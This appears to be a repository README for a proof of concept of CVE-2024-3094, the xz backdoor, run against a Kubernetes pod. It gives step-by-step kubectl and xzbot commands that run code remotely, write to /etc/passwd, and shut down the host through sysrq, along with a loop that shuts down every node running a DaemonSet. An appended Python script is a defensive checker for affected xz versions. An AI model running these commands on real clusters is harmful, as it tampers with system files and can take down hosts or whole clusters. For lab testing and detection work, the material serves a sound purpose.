
CVE-2024-3094

Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster

❗ DISCLAIMER ❗

USE ONLY FOR EDUCATIONAL PURPOSES THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THE USE OF THIS SOFTWARE

Description

We will deploy a vulnerable pod and exploit it to execute commands inside that vulnerable pod. We do this from inside the same network for safety: the vulnerable pod is not exposed to the internet, but the concept is the same.

The vulnerability allows executing commands inside the pod even when the pod runs with a security context; for example, you can shut down the host that is running the pod.

If the vulnerable image runs in a single pod, you can shut down its host, making every service on that host temporarily unavailable. If it runs as a DaemonSet, you can shut down all the hosts running that DaemonSet, even the whole cluster.

Requirements

  • K8s cluster deployed
  • Kubectl installed
  • Access to the K8s cluster
  • Go installed

Usage

First, install xzbot (it runs on your workstation and is later pointed at the port-forward)

go install github.com/amlweems/xzbot@latest

Clone the repo and deploy the vulnerable Deployment or DaemonSet

git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# Or daemonset
kubectl apply -f daemonset_cve-2024-3094.yml
# Get the pod name
kubectl -n vulnes get pods

# Port forward the pod
kubectl -n vulnes port-forward <pod-name> 2225:22

# Execute command, for example write in /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'

# Check the /etc/passwd file
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd

Go further and shut down the host

# Enable sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'

# Shutdown the host
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'

You can also shut down all the hosts that are running the DaemonSet

source shutdown_nodes.sh

Known issues

1. Connection refused

When you run the loop to shut down all the hosts, if you receive this error:

2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refused

Give the port-forward more time to become ready; you can increase the sleep time in the loop.

Extra info

The container image used was built with the Dockerfile in the repo; you can build the image yourself and push it to your own registry.

To generate the liblzma.so.5.6.0.patch library, use the amlweems repo listed in the references.
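The image built here carries liblzma 5.6.0, one of the two upstream releases that shipped the backdoor. A defender-side triage check, added as an example and not part of this repo or the referenced ones, that flags those versions in the text `xz --version` or a package manager prints inside a pod, and tells a Debian-style `+really` rebuild of an older release apart from a genuinely vulnerable one (the sample lines are constructed, not captured):

```python
"""Flag xz/liblzma builds in the CVE-2024-3094 range from version output.

Added example, not part of the repo. Input is the text that `xz --version`
or a package manager prints inside a pod; samples below are constructed.
"""
import re

# Upstream releases that shipped the backdoored liblzma.
BACKDOORED_XZ_VERSIONS = {"5.6.0", "5.6.1"}

# Version triple, optionally followed by a distro '+really<version>' suffix.
VERSION_RE = re.compile(r"\b(\d+\.\d+\.\d+)(\+really(\d+\.\d+\.\d+))?")


def xz_version_status(line: str) -> str:
    """Classify one line of version output as vulnerable/reverted/ok/unknown."""
    m = VERSION_RE.search(line)
    if not m:
        return "unknown"
    upstream, really = m.group(1), m.group(3)
    if upstream not in BACKDOORED_XZ_VERSIONS:
        return "ok"
    # Debian-style '5.6.1+really5.4.5' keeps the 5.6.x package number for
    # ordering but ships the older, clean code: not vulnerable.
    if really and really not in BACKDOORED_XZ_VERSIONS:
        return "reverted"
    return "vulnerable"


def scan_version_output(output: str) -> list[tuple[str, str]]:
    """Return (status, line) for every non-empty line carrying a version."""
    results = []
    for raw in output.splitlines():
        line = raw.strip()
        if line and (status := xz_version_status(line)) != "unknown":
            results.append((status, line))
    return results


# Constructed sample: what `xz --version` and `dpkg -l` might print in a pod.
SAMPLE_OUTPUT = """\
xz (XZ Utils) 5.6.0
liblzma 5.6.0
ii  liblzma5:amd64  5.6.1+really5.4.5-1  amd64  XZ-format compression library
ii  xz-utils        5.4.5-0.3            amd64  XZ-format compression utilities
"""

if __name__ == "__main__":
    for status, line in scan_version_output(SAMPLE_OUTPUT):
        print(f"{status:10s} {line}")
```

A version match is triage, not proof: the backdoor only becomes reachable in an sshd process that is linked against the affected liblzma, so confirm a hit with your distribution's advisory before acting on it.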

References

amlweems repo

r0binak repo